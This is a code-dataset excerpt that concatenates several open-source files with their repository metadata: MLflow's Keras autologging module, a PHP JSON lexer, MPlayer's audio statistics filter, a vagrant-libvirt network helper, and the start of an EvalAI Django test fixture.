        keras_model = mlflow.keras.load_model("runs:/96771d893a5e46159d9f3b49bf9013e2" + "/models")
        predictions = keras_model.predict(x_test)
    """
    # Resolve the (possibly remote) URI to a local copy of the artifacts.
    model_dir = _download_artifact_from_uri(artifact_uri=model_uri)
    # The flavor configuration records which Keras implementation saved the model
    # and where the model data lives relative to the artifact root.
    conf = _get_flavor_configuration(model_path=model_dir, flavor_name=FLAVOR_NAME)
    saving_module = importlib.import_module(conf.get("keras_module", "keras"))
    artifacts_path = os.path.join(model_dir, conf.get("data", _MODEL_SAVE_PATH))
    return _load_model(model_path=artifacts_path, keras_module=saving_module, **kwargs)
@experimental
def autolog():
    # pylint: disable=E0611
    """
    Enables automatic logging from Keras to MLflow. Autologging captures the following information:

    **Metrics** and **Parameters**
    - Training loss; validation loss; user-specified metrics
    - Metrics associated with the ``EarlyStopping`` callbacks: ``stopped_epoch``,
      ``restored_epoch``, ``restore_best_weights``, ``last_epoch``, etc
    - ``fit()`` or ``fit_generator()`` parameters; optimizer name; learning rate; epsilon
    - ``fit()`` or ``fit_generator()`` parameters associated with ``EarlyStopping``: ``min_delta``,
      ``patience``, ``baseline``, ``restore_best_weights``, etc

    **Artifacts**
    - Model summary on training start
    - `MLflow Model <https://mlflow.org/docs/latest/models.html>`_ (Keras model) on training end

    .. code-block:: python
        :caption: Example

        import mlflow
        import mlflow.keras
        # Build, compile, enable autologging, and train your model
        keras_model = ...
        keras_model.compile(optimizer="rmsprop", loss="mse", metrics=["accuracy"])
        # autolog your metrics, parameters, and model
        mlflow.keras.autolog()
        results = keras_model.fit(
            x_train, y_train, epochs=20, batch_size=128, validation_data=(x_val, y_val))

    ``EarlyStopping Integration with Keras AutoLogging``

    MLflow will detect if an ``EarlyStopping`` callback is used in a ``fit()`` or
    ``fit_generator()`` call, and if the ``restore_best_weights`` parameter is set to be ``True``,
    then MLflow will log the metrics associated with the restored model as a final, extra step.
    The epoch of the restored model will also be logged as the metric ``restored_epoch``.
    This allows for easy comparison between the actual metrics of the restored model and
    the metrics of other models.

    If ``restore_best_weights`` is set to be ``False``, then MLflow will not log an additional step.

    Regardless of ``restore_best_weights``, MLflow will also log ``stopped_epoch``,
    which indicates the epoch at which training stopped due to early stopping.

    If training does not end due to early stopping, then ``stopped_epoch`` will be logged as ``0``.

    MLflow will also log the parameters of the ``EarlyStopping`` callback,
    excluding ``mode`` and ``verbose``.
    """
    import keras

    class __MLflowKerasCallback(keras.callbacks.Callback):
        """
        Callback for auto-logging metrics and parameters.
        Records available logs after each epoch.
        Records model structural information as params when training begins
        """

        def on_train_begin(self, logs=None):  # pylint: disable=unused-argument
            try_mlflow_log(mlflow.log_param, 'num_layers', len(self.model.layers))
            try_mlflow_log(mlflow.log_param, 'optimizer_name', type(self.model.optimizer).__name__)
            # lr/epsilon may be plain floats or backend tensors; evaluate tensors
            # through the Keras backend before logging.
            if hasattr(self.model.optimizer, 'lr'):
                lr = self.model.optimizer.lr if \
                    type(self.model.optimizer.lr) is float \
                    else keras.backend.eval(self.model.optimizer.lr)
                try_mlflow_log(mlflow.log_param, 'learning_rate', lr)
            if hasattr(self.model.optimizer, 'epsilon'):
                epsilon = self.model.optimizer.epsilon if \
                    type(self.model.optimizer.epsilon) is float \
                    else keras.backend.eval(self.model.optimizer.epsilon)
                try_mlflow_log(mlflow.log_param, 'epsilon', epsilon)
            # Log the model summary as a text artifact; the temp dir is removed
            # even if artifact logging fails.
            sum_list = []
            self.model.summary(print_fn=sum_list.append)
            summary = '\n'.join(sum_list)
            tempdir = tempfile.mkdtemp()
            try:
                summary_file = os.path.join(tempdir, "model_summary.txt")
                with open(summary_file, 'w') as f:
                    f.write(summary)
                try_mlflow_log(mlflow.log_artifact, local_path=summary_file)
            finally:
                shutil.rmtree(tempdir)

        def on_epoch_end(self, epoch, logs=None):
            # ``logs`` carries the epoch's metrics; skip empty payloads.
            if not logs:
                return
            try_mlflow_log(mlflow.log_metrics, logs, step=epoch)

        def on_train_end(self, logs=None):
            # Persist the trained model as an MLflow Model artifact.
            try_mlflow_log(log_model, self.model, artifact_path='model')

        # As of Keras 2.4.0, Keras Callback implementations must define the following
        # methods indicating whether or not the callback overrides functions for
        # batch training/testing/inference
        def _implements_train_batch_hooks(self): return False

        def _implements_test_batch_hooks(self): return False

        def _implements_predict_batch_hooks(self): return False

    def _early_stop_check(callbacks):
        # Return the first EarlyStopping instance in ``callbacks``, or None.
        # EarlyStopping moved to keras.callbacks.callbacks in Keras 2.3.0.
        if LooseVersion(keras.__version__) < LooseVersion('2.3.0'):
            es_callback = keras.callbacks.EarlyStopping
        else:
            es_callback = keras.callbacks.callbacks.EarlyStopping
        for callback in callbacks:
            if isinstance(callback, es_callback):
                return callback
        return None

    def _log_early_stop_callback_params(callback):
        # Best-effort: a callback missing any expected attribute aborts silently.
        if callback:
            try:
                earlystopping_params = {'monitor': callback.monitor,
                                        'min_delta': callback.min_delta,
                                        'patience': callback.patience,
                                        'baseline': callback.baseline,
                                        'restore_best_weights': callback.restore_best_weights}
                try_mlflow_log(mlflow.log_params, earlystopping_params)
            except Exception:  # pylint: disable=W0703
                return

    def _get_early_stop_callback_attrs(callback):
        # Returns (stopped_epoch, restore_best_weights, patience) or None when
        # the callback does not expose them (older Keras versions).
        try:
            return callback.stopped_epoch, callback.restore_best_weights, callback.patience
        except Exception:  # pylint: disable=W0703
            return None

    def _log_early_stop_callback_metrics(callback, history):
        if callback:
            callback_attrs = _get_early_stop_callback_attrs(callback)
            if callback_attrs is None:
                return
            stopped_epoch, restore_best_weights, patience = callback_attrs
            try_mlflow_log(mlflow.log_metric, 'stopped_epoch', stopped_epoch)
            # Weights are restored only if early stopping occurs
            if stopped_epoch != 0 and restore_best_weights:
                # NOTE(review): assumes the best epoch is exactly ``patience``
                # epochs before the stop (at least 1) — confirm against the
                # EarlyStopping implementation for the supported Keras versions.
                restored_epoch = stopped_epoch - max(1, patience)
                try_mlflow_log(mlflow.log_metric, 'restored_epoch', restored_epoch)
                restored_metrics = {key: history.history[key][restored_epoch]
                                    for key in history.history.keys()}
                # Checking that a metric history exists
                metric_key = next(iter(history.history), None)
                if metric_key is not None:
                    # Log restored metrics one step past the recorded epochs so
                    # they appear as a final, extra step.
                    last_epoch = len(history.history[metric_key])
                    try_mlflow_log(mlflow.log_metrics, restored_metrics, step=last_epoch)

    def _run_and_log_function(self, original, args, kwargs, unlogged_params, callback_arg_index):
        # Start a run implicitly when the user has not; remember to end it.
        if not mlflow.active_run():
            try_mlflow_log(mlflow.start_run)
            auto_end_run = True
        else:
            auto_end_run = False
        log_fn_args_as_params(original, args, kwargs, unlogged_params)
        early_stop_callback = None
        # Checking if the 'callback' argument of the function is set
        # (positionally at ``callback_arg_index``, or via the kwarg).
        if len(args) > callback_arg_index:
            tmp_list = list(args)
            early_stop_callback = _early_stop_check(tmp_list[callback_arg_index])
            tmp_list[callback_arg_index] += [__MLflowKerasCallback()]
            args = tuple(tmp_list)
        elif 'callbacks' in kwargs:
            early_stop_callback = _early_stop_check(kwargs['callbacks'])
            kwargs['callbacks'] += [__MLflowKerasCallback()]
        else:
            kwargs['callbacks'] = [__MLflowKerasCallback()]
        _log_early_stop_callback_params(early_stop_callback)
        history = original(self, *args, **kwargs)
        _log_early_stop_callback_metrics(early_stop_callback, history)
        if auto_end_run:
            try_mlflow_log(mlflow.end_run)
        return history

    @gorilla.patch(keras.Model)
    def fit(self, *args, **kwargs):
        original = gorilla.get_original_attribute(keras.Model, 'fit')
        # 'callbacks' is the 6th positional parameter of Model.fit (index 5).
        unlogged_params = ['self', 'x', 'y', 'callbacks', 'validation_data', 'verbose']
        return _run_and_log_function(self, original, args, kwargs, unlogged_params, 5)

    @gorilla.patch(keras.Model)
    def fit_generator(self, *args, **kwargs):
        original = gorilla.get_original_attribute(keras.Model, 'fit_generator')
        # 'callbacks' is the 5th positional parameter of fit_generator (index 4).
        unlogged_params = ['self', 'generator', 'callbacks', 'validation_data', 'verbose']
        return _run_and_log_function(self, original, args, kwargs, unlogged_params, 4)

    # Install the patches; store_hit keeps the original attributes recoverable.
    settings = gorilla.Settings(allow_hit=True, store_hit=True)
    gorilla.apply(gorilla.Patch(keras.Model, 'fit', fit, settings=settings))
    gorilla.apply(gorilla.Patch(keras.Model, 'fit_generator', fit_generator, settings=settings))
|
Python
|
Apache-2.0
|
AnesBenmerzoug/mlflow/mlflow/keras.py
|
322e1220-66bd-479c-ba47-f1331e49a950
|
[]
|
[]
|
<?php
declare(strict_types=1);
namespace Shin1x1\ToyJsonParser\Lexer;
use JetBrains\PhpStorm\Immutable;
use Shin1x1\ToyJsonParser\Lexer\Exception\LexerException;
use Shin1x1\ToyJsonParser\Lexer\Token\ColonToken;
use Shin1x1\ToyJsonParser\Lexer\Token\CommaToken;
use Shin1x1\ToyJsonParser\Lexer\Token\EofToken;
use Shin1x1\ToyJsonParser\Lexer\Token\FalseToken;
use Shin1x1\ToyJsonParser\Lexer\Token\LeftCurlyBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\LeftSquareBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\NullToken;
use Shin1x1\ToyJsonParser\Lexer\Token\NumberToken;
use Shin1x1\ToyJsonParser\Lexer\Token\RightCurlyBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\RightSquareBracketToken;
use Shin1x1\ToyJsonParser\Lexer\Token\StringToken;
use Shin1x1\ToyJsonParser\Lexer\Token\Token;
use Shin1x1\ToyJsonParser\Lexer\Token\TrueToken;
/**
 * Hand-written JSON tokenizer: converts the raw JSON text into a stream of
 * Token objects consumed by the parser. Call getNextToken() repeatedly until
 * it returns an EofToken.
 */
final class Lexer
{
    /** Total length of the input in bytes. */
    private int $length;

    /** Current read offset into the input (byte index). */
    private int $position;

    public function __construct(#[Immutable] private readonly string $json)
    {
        $this->length = strlen($this->json);
        $this->position = 0;
    }

    /**
     * Return the next token, skipping insignificant whitespace.
     *
     * @throws LexerException on any character that cannot start a token
     */
    public function getNextToken(): Token
    {
        do {
            $ch = $this->consume();
            if ($ch === null) {
                return new EofToken();
            }
        } while ($this->isSkipCharacter($ch));
        return match ($ch) {
            '[' => new LeftSquareBracketToken(),
            ']' => new RightSquareBracketToken(),
            '{' => new LeftCurlyBracketToken(),
            '}' => new RightCurlyBracketToken(),
            ':' => new ColonToken(),
            ',' => new CommaToken(),
            '"' => $this->getStringToken(),
            '-', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9' => $this->getNumberToken($ch),
            't' => $this->getLiteralToken('true', TrueToken::class),
            'f' => $this->getLiteralToken('false', FalseToken::class),
            'n' => $this->getLiteralToken('null', NullToken::class),
            default => throw new LexerException('Invalid character ' . $ch),
        };
    }

    /** JSON insignificant whitespace: space, LF, CR, TAB. */
    private function isSkipCharacter(?string $ch): bool
    {
        return $ch === ' ' || $ch === "\n" || $ch === "\r" || $ch === "\t";
    }

    /**
     * Scan a string token; the opening '"' has already been consumed.
     * Handles the JSON escape sequences, including \uXXXX code points.
     *
     * @throws LexerException when the input ends before the closing '"'
     */
    private function getStringToken(): StringToken
    {
        $str = '';
        while (($ch = $this->consume()) !== null) {
            if ($ch === '"') {
                return new StringToken($str);
            }
            if ($ch !== '\\') {
                $str .= $ch;
                continue;
            }
            // Backslash: decode the escape from the following character.
            $str .= match ($ch = $this->consume()) {
                '"' => '"',
                '\\' => '\\',
                '/' => '/',
                'b' => chr(0x8),
                'f' => "\f",
                'n' => "\n",
                'r' => "\r",
                't' => "\t",
                'u' => $this->getCharacterByCodePoint(),
                default => '\\' . $ch,
            };
        }
        throw new LexerException('No end of string');
    }

    /**
     * Decode the four hex digits after "\u" into a UTF-8 character.
     * NOTE(review): UTF-16 surrogate pairs are not combined — presumably
     * acceptable for this toy parser; confirm if BMP-external characters
     * must round-trip.
     *
     * @throws LexerException when any of the four digits is not hex
     */
    private function getCharacterByCodePoint(): string
    {
        $codepoint = '';
        for ($i = 0; $i < 4; $i++) {
            $ch = $this->consume();
            if ($ch !== null
                && ('0' <= $ch && $ch <= '9'
                    || 'A' <= $ch && $ch <= 'F'
                    || 'a' <= $ch && $ch <= 'f')) {
                $codepoint .= $ch;
                continue;
            }
            throw new LexerException('Invalid code point');
        }
        return mb_chr(hexdec($codepoint));
    }

    /**
     * Scan a number token starting with $ch (a digit or '-') using a small
     * state machine over the JSON number grammar (int, frac, exp).
     *
     * @see https://github.com/shin1x1/php8-toy-json-parser/blob/master/diagrams/number.png
     *
     * @throws LexerException when the characters do not form a valid number
     */
    private function getNumberToken(string $ch): NumberToken
    {
        $number = $ch;
        // Initial state depends on the first character: a leading zero may
        // only be followed by '.' or the end of the number.
        $state = match ($ch) {
            '-' => 'MINUS',
            '0' => 'INT_ZERO',
            default => 'INT',
        };
        $isFloat = false;
        $isDigit19 = fn($ch) => '1' <= $ch && $ch <= '9';
        $isDigit = fn($ch) => '0' <= $ch && $ch <= '9';
        $isExp = fn($ch) => $ch === 'e' || $ch === 'E';
        // Consume characters while they extend the number; `break 2` leaves
        // the loop when the current character cannot extend it.
        while (true) {
            $ch = $this->current();
            switch ($state) {
                case 'INT':
                    if ($isDigit($ch)) {
                        $number .= $this->consume();
                        break;
                    }
                    if ($ch === '.') {
                        $number .= $this->consume();
                        $state = 'DECIMAL_POINT';
                        break;
                    }
                    if ($isExp($ch)) {
                        $number .= $this->consume();
                        $state = 'EXP';
                        break;
                    }
                    break 2;
                case 'MINUS':
                    if ($isDigit19($ch)) {
                        $number .= $this->consume();
                        $state = 'INT';
                        break;
                    }
                    if ($ch === '0') {
                        $number .= $this->consume();
                        $state = 'INT_ZERO';
                        break;
                    }
                    break 2;
                case 'INT_ZERO':
                    if ($ch === '.') {
                        $number .= $this->consume();
                        $state = 'DECIMAL_POINT';
                        break;
                    }
                    // JSON forbids leading zeros such as "01".
                    if ($isDigit($ch)) {
                        throw new LexerException('Invalid number:' . $ch);
                    }
                    break 2;
                case 'DECIMAL_POINT':
                    $isFloat = true;
                    if ($isDigit($ch)) {
                        $number .= $this->consume();
                        $state = 'DECIMAL_POINT_INT';
                        break;
                    }
                    break 2;
                case 'DECIMAL_POINT_INT':
                    if ($isDigit($ch)) {
                        $number .= $this->consume();
                        break;
                    }
                    if ($isExp($ch)) {
                        $number .= $this->consume();
                        $state = 'EXP';
                        break;
                    }
                    break 2;
                case 'EXP':
                    $isFloat = true;
                    if ($isDigit($ch) || $ch === '-' || $ch === '+') {
                        $number .= $this->consume();
                        $state = 'EXP_INT';
                        break;
                    }
                    break 2;
                case 'EXP_INT':
                    if ($isDigit($ch)) {
                        $number .= $this->consume();
                        break;
                    }
                    break 2;
                default:
                    break 2;
            }
        }
        // A valid JSON number always ends in a digit; anything else means the
        // state machine stopped mid-token (e.g. "1.", "-", "2e").
        $lastCh = $number[strlen($number) - 1];
        if ('0' <= $lastCh && $lastCh <= '9') {
            return new NumberToken($isFloat ? (float)$number : (int)$number);
        }
        throw new LexerException('Invalid number:' . $ch);
    }

    /**
     * Scan one of the keyword literals (true/false/null). The first letter
     * has already been consumed; read the rest and verify the full word.
     *
     * @throws LexerException on truncated input or a mismatched keyword
     */
    private function getLiteralToken(string $expectedName, string $klass): TrueToken|FalseToken|NullToken
    {
        $name = $expectedName[0];
        for ($i = 1; $i < strlen($expectedName); $i++) {
            $ch = $this->consume();
            if ($ch === null) {
                throw new LexerException('Unexpected end of text');
            }
            $name .= $ch;
        }
        if ($name !== $expectedName) {
            throw new LexerException('Unexpected literal ' . $name);
        }
        return new $klass;
    }

    /** Peek at the current character without advancing; '' at end of input. */
    private function current(): string
    {
        return $this->json[$this->position] ?? '';
    }

    /** Return the current character and advance; null at end of input. */
    private function consume(): ?string
    {
        if ($this->length <= $this->position) {
            return null;
        }
        $ch = $this->current();
        $this->position++;
        return $ch;
    }
}
|
PHP
|
MIT
|
shin1x1/toy-json-parser/PHP/src/Lexer/Lexer.php
|
f94aeb01-612b-4a92-88e1-cb81c5029e87
|
[{"tag": "USERNAME", "value": "shin1x1", "start": 3575, "end": 3582, "context": "));\n }\n\n /**\n * @see https://github.com/shin1x1/php8-toy-json-parser/blob/master/diagrams/number."}]
|
[{"tag": "USERNAME", "value": "shin1x1", "start": 3575, "end": 3582, "context": "));\n }\n\n /**\n * @see https://github.com/shin1x1/php8-toy-json-parser/blob/master/diagrams/number."}]
|
/*
* Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>
*
* This file is part of MPlayer.
*
* MPlayer is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* MPlayer is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with MPlayer; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
#include <math.h>
#include "mp_msg.h"
#include "af.h"
#define MAX_DB 80
#define MIN_VAL 1E-8
struct af_stats {
long long n_samples;
double tsquare;
int max;
long long histogram[65536];
};
static inline int logdb(double v)
{
if (v > 1)
return 0;
if (v <= MIN_VAL)
return MAX_DB - 1;
return log(v) / -0.23025850929940456840179914546843642076;
}
/*
 * (Re)configure the filter: force signed 16-bit native-endian output and
 * reset all accumulated statistics. Returns AF_ERROR when no input format
 * is supplied, otherwise the result of af_test_output().
 */
static int stats_init(af_instance_t *af, struct af_stats *s, af_data_t *data)
{
    int bin;

    if (data == NULL)
        return AF_ERROR;

    /* Copy the input configuration, then pin the sample format. */
    *(af->data) = *data;
    af->data->format = AF_FORMAT_S16_NE;
    af->data->bps = 2;

    s->n_samples = 0;
    s->tsquare = 0;
    s->max = 0;
    for (bin = 0; bin < 65536; bin++)
        s->histogram[bin] = 0;

    return af_test_output(af, data);
}
/*
 * Print the final statistics: sample count, mean and max volume in dB, and
 * a per-dB histogram truncated once 0.1% of all samples has been covered.
 */
static void stats_print(struct af_stats *s)
{
    int i;
    long long sum;
    float v;
    long long h[MAX_DB];
    /* Normalize the accumulated sum of squares from raw s16 units to [0, 1]. */
    s->tsquare /= 32768 * 32768;
    mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: n_samples: %lld\n", s->n_samples);
    if (s->n_samples == 0)
        return;
    mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: mean_volume: -%d dB\n",
           logdb(s->tsquare / s->n_samples));
    mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: max_volume: -%d dB\n",
           logdb(s->max / (32768.0 * 32768.0)));
    /* Fold the 65536-entry sample-value histogram into MAX_DB dB buckets. */
    for (i = 0; i < MAX_DB; i++)
        h[i] = 0;
    for (i = 0; i < 65536; i++) {
        v = (i - 32768) / 32768.0;
        h[logdb(v * v)] += s->histogram[i];
    }
    /* Skip leading empty buckets (levels louder than anything observed). */
    for (i = 0; i < MAX_DB; i++)
        if (h[i] != 0)
            break;
    sum = 0;
    /* Print buckets until 0.1% of all samples has been accounted for. */
    for (; i < MAX_DB; i++) {
        sum += h[i];
        mp_msg(MSGT_AFILTER, MSGL_INFO, "stats: histogram_%ddb: %lld\n",
               i, h[i]);
        if (sum > s->n_samples / 1000)
            break;
    }
}
/*
 * Filter control entry point: handle (re)initialization and the
 * pre-destroy hook that dumps the collected statistics.
 */
static int control(struct af_instance_s *af, int cmd, void *arg)
{
    struct af_stats *s = af->setup;

    if (cmd == AF_CONTROL_REINIT)
        return stats_init(af, s, arg);
    if (cmd == AF_CONTROL_PRE_DESTROY) {
        stats_print(s);
        return AF_OK;
    }
    return AF_UNKNOWN;
}
/* Release the per-instance buffers allocated in af_open(). */
static void uninit(struct af_instance_s *af)
{
    free(af->setup);
    free(af->data);
}
/*
 * Process one block of s16 audio: update the sample count, the running sum
 * of squares, the per-value histogram and the peak square. The audio data
 * itself passes through unmodified.
 */
static af_data_t *play(struct af_instance_s *af, af_data_t *data)
{
    struct af_stats *s = af->setup;
    int16_t *sample = data->audio;
    int16_t *end = (int16_t *)((char *)data->audio + data->len);

    s->n_samples += end - sample;
    while (sample < end) {
        int value = *sample++;
        int square = value * value;

        s->tsquare += square;
        s->histogram[value + 32768]++;
        if (square > s->max)
            s->max = square;
    }
    return data;
}
/*
 * Allocate the per-instance state and install the filter callbacks.
 *
 * Fix vs. the original: when only one of the two allocations succeeds, the
 * successful one is freed and both pointers are reset to NULL, so nothing
 * leaks and a later free() on the instance (free(NULL) is a no-op) is safe.
 */
static int af_open(af_instance_t *af)
{
    af->control = control;
    af->uninit = uninit;
    af->play = play;
    af->mul = 1;
    af->data = malloc(sizeof(af_data_t));
    af->setup = malloc(sizeof(struct af_stats));
    if (af->data == NULL || af->setup == NULL) {
        free(af->data);
        free(af->setup);
        af->data = NULL;
        af->setup = NULL;
        return AF_ERROR;
    }
    return AF_OK;
}
/* Filter registration record; af_open is the per-instance entry point. */
const af_info_t af_info_stats = {
    "Statistics audio filter",
    "stats",
    "Nicolas George",
    "",
    0,
    af_open
};
|
C
|
MIT
|
Minaduki-Shigure/BeagleBone_Proj/mplayer/src/MPlayer-1.4/libaf/af_stats.c
|
74dde006-6826-4a71-815d-ed952e48df2c
|
[{"tag": "EMAIL", "value": "nicolas.george@normalesup.org", "start": 41, "end": 70, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file is part of MPlayer.\n *\n * MPlaye"}, {"tag": "NAME", "value": "Nicolas George", "start": 25, "end": 39, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file i"}]
|
[{"tag": "EMAIL", "value": "nicolas.george@normalesup.org", "start": 41, "end": 70, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file is part of MPlayer.\n *\n * MPlaye"}, {"tag": "NAME", "value": "Nicolas George", "start": 25, "end": 39, "context": "/*\n * Copyright (C) 2009 Nicolas George <nicolas.george@normalesup.org>\n *\n * This file i"}]
|
require 'ipaddr'
require 'nokogiri'
require 'vagrant/util/network_ip'
# Reopen stdlib IPAddr to expose the netmask in dotted-quad string form.
class IPAddr
  # Returns the subnet mask as a string (e.g. "255.255.255.0"), or nil when
  # the address has not been initialized.
  def get_mask
    return unless @addr

    _to_string(@mask_addr)
  end
end
module VagrantPlugins
  module ProviderLibvirt
    module Util
      # Helpers for translating Vagrantfile network configuration into the
      # option hashes used when creating/attaching Libvirt networks.
      module NetworkUtil
        include Vagrant::Util::NetworkIP

        # Build the list of network option hashes for the machine: the
        # management network first (unless mgmt_attach is disabled),
        # followed by one entry per network declared in the Vagrantfile.
        def configured_networks(env, logger)
          qemu_use_session = env[:machine].provider_config.qemu_use_session
          management_network_device = env[:machine].provider_config.management_network_device
          management_network_name = env[:machine].provider_config.management_network_name
          management_network_address = env[:machine].provider_config.management_network_address
          management_network_mode = env[:machine].provider_config.management_network_mode
          management_network_mac = env[:machine].provider_config.management_network_mac
          management_network_guest_ipv6 = env[:machine].provider_config.management_network_guest_ipv6
          management_network_autostart = env[:machine].provider_config.management_network_autostart
          management_network_pci_bus = env[:machine].provider_config.management_network_pci_bus
          management_network_pci_slot = env[:machine].provider_config.management_network_pci_slot
          management_network_domain = env[:machine].provider_config.management_network_domain
          management_network_mtu = env[:machine].provider_config.management_network_mtu
          logger.info "Using #{management_network_name} at #{management_network_address} as the management network #{management_network_mode} is the mode"
          begin
            management_network_ip = IPAddr.new(management_network_address)
          rescue ArgumentError
            raise Errors::ManagementNetworkError,
                  error_message: "#{management_network_address} is not a valid IP address"
          end
          # capture address into $1 and mask into $2
          # NOTE(review): relies on the exact format of IPAddr#inspect
          # ("... IPv4:<addr>/<mask>>"); confirm across supported Ruby versions.
          management_network_ip.inspect =~ /IPv4:(.*)\/(.*)>/
          # A /32 mask means the user supplied a bare address with no subnet.
          if Regexp.last_match(2) == '255.255.255.255'
            raise Errors::ManagementNetworkError,
                  error_message: "#{management_network_address} does not include both an address and subnet mask"
          end
          if qemu_use_session
            # qemu:///session cannot define its own networks; bridge instead.
            management_network_options = {
              iface_type: :public_network,
              dev: management_network_device,
              mode: 'bridge',
              type: 'bridge',
              bus: management_network_pci_bus,
              slot: management_network_pci_slot
            }
          else
            management_network_options = {
              iface_type: :private_network,
              network_name: management_network_name,
              ip: Regexp.last_match(1),
              netmask: Regexp.last_match(2),
              dhcp_enabled: true,
              forward_mode: management_network_mode,
              guest_ipv6: management_network_guest_ipv6,
              autostart: management_network_autostart,
              bus: management_network_pci_bus,
              slot: management_network_pci_slot
            }
          end
          # Optional settings are only added when explicitly configured.
          unless management_network_mac.nil?
            management_network_options[:mac] = management_network_mac
          end
          unless management_network_domain.nil?
            management_network_options[:domain_name] = management_network_domain
          end
          unless management_network_mtu.nil?
            management_network_options[:mtu] = management_network_mtu
          end
          unless management_network_pci_bus.nil? and management_network_pci_slot.nil?
            management_network_options[:bus] = management_network_pci_bus
            management_network_options[:slot] = management_network_pci_slot
          end
          # NOTE(review): this raises whenever a box is configured and
          # mgmt_attach is disabled — presumably because box-backed machines
          # require the management network for communication; confirm intent.
          if (env[:machine].config.vm.box &&
              !env[:machine].provider_config.mgmt_attach)
            raise Errors::ManagementNetworkRequired
          end
          # add management network to list of networks to check
          # unless mgmt_attach set to false
          networks = if env[:machine].provider_config.mgmt_attach
                       [management_network_options]
                     else
                       []
                     end
          env[:machine].config.vm.networks.each do |type, original_options|
            logger.debug "In config found network type #{type} options #{original_options}"
            # Options can be specified in Vagrantfile in short format (:ip => ...),
            # or provider format # (:libvirt__network_name => ...).
            # https://github.com/mitchellh/vagrant/blob/master/lib/vagrant/util/scoped_hash_override.rb
            options = scoped_hash_override(original_options, :libvirt)
            # store type in options
            # use default values if not already set
            options = {
              iface_type: type,
              netmask: options[:network_address] ?
                  IPAddr.new(options[:network_address]).get_mask :
                  '255.255.255.0',
              dhcp_enabled: true,
              forward_mode: 'nat'
            }.merge(options)
            # A DHCP network without a fixed IP gets a well-known default name.
            if options[:type].to_s == 'dhcp' && options[:ip].nil?
              options[:network_name] = options[:network_name] ?
                  options[:network_name] :
                  'vagrant-private-dhcp'
            end
            # add to list of networks to check
            networks.push(options)
          end
          networks
        end

        # Return a list of all (active and inactive) Libvirt networks as a list
        # of hashes with their name, network address and status (active or not)
        def libvirt_networks(libvirt_client)
          libvirt_networks = []
          active = libvirt_client.list_networks
          inactive = libvirt_client.list_defined_networks
          # Iterate over all (active and inactive) networks.
          active.concat(inactive).each do |network_name|
            libvirt_network = libvirt_client.lookup_network_by_name(
              network_name
            )
            # Parse ip address and netmask from the network xml description.
            xml = Nokogiri::XML(libvirt_network.xml_desc)
            ip = xml.xpath('/network/ip/@address').first
            ip = ip.value if ip
            netmask = xml.xpath('/network/ip/@netmask').first
            netmask = netmask.value if netmask
            dhcp_enabled = if xml.at_xpath('//network/ip/dhcp')
                             true
                           else
                             false
                           end
            domain_name = xml.at_xpath('/network/domain/@name')
            domain_name = domain_name.value if domain_name
            # Calculate network address of network from ip address and
            # netmask.
            network_address = (network_address(ip, netmask) if ip && netmask)
            libvirt_networks << {
              name: network_name,
              ip_address: ip,
              netmask: netmask,
              network_address: network_address,
              dhcp_enabled: dhcp_enabled,
              bridge_name: libvirt_network.bridge_name,
              domain_name: domain_name,
              created: true,
              active: libvirt_network.active?,
              autostart: libvirt_network.autostart?,
              libvirt_network: libvirt_network
            }
          end
          libvirt_networks
        end
      end
    end
  end
end
|
Ruby
|
MIT
|
alvistack/vagrant-libvirt-vagrant-libvirt/lib/vagrant-libvirt/util/network_util.rb
|
5921c854-e568-4776-826e-9119e4263c17
|
[{"tag": "IP_ADDRESS", "value": "255.255.255.0", "start": 5059, "end": 5072, "context": "address]).get_mask :\n '255.255.255.0',\n dhcp_enabled: true,\n "}, {"tag": "IP_ADDRESS", "value": "255.255.255.255", "start": 2035, "end": 2050, "context": "*)\\/(.*)>/\n\n if Regexp.last_match(2) == '255.255.255.255'\n raise Errors::ManagementNetworkError"}]
|
[{"tag": "IP_ADDRESS", "value": "255.255.255.0", "start": 5059, "end": 5072, "context": "address]).get_mask :\n '255.255.255.0',\n dhcp_enabled: true,\n "}, {"tag": "IP_ADDRESS", "value": "255.255.255.255", "start": 2035, "end": 2050, "context": "*)\\/(.*)>/\n\n if Regexp.last_match(2) == '255.255.255.255'\n raise Errors::ManagementNetworkError"}]
|
import os
import shutil
from datetime import timedelta
from django.contrib.admin.sites import AdminSite
from django.core.files.uploadedfile import SimpleUploadedFile
from django.contrib.auth.models import User
from django.utils import timezone
from allauth.account.models import EmailAddress
from rest_framework.test import APITestCase, APIClient
from challenges.models import Challenge, ChallengePhase
from hosts.models import ChallengeHostTeam
from jobs.models import Submission
from jobs.admin import SubmissionAdmin
from participants.models import ParticipantTeam, Participant
class BaseAPITestClass(APITestCase):
    """Common fixture for submission admin tests.

    Builds the minimal object graph a submission needs: a host user/team,
    a participant user/team, a challenge with one phase (whose files are
    written under /tmp/evalai), and one submitted Submission. The client is
    authenticated as the host user.
    """

    def setUp(self):
        self.client = APIClient(enforce_csrf_checks=True)
        # Host-side user (owns the challenge).
        self.user = User.objects.create(
            username="someuser",
            email="user@test.com",
            password="secret_password",
        )
        EmailAddress.objects.create(
            user=self.user, email="user@test.com", primary=True, verified=True
        )
        # Participant-side user (submits to the challenge).
        self.user1 = User.objects.create(
            username="someuser1",
            email="user1@test.com",
            password="secret_password1",
        )
        EmailAddress.objects.create(
            user=self.user1,
            email="user1@test.com",
            primary=True,
            verified=True,
        )
        self.challenge_host_team = ChallengeHostTeam.objects.create(
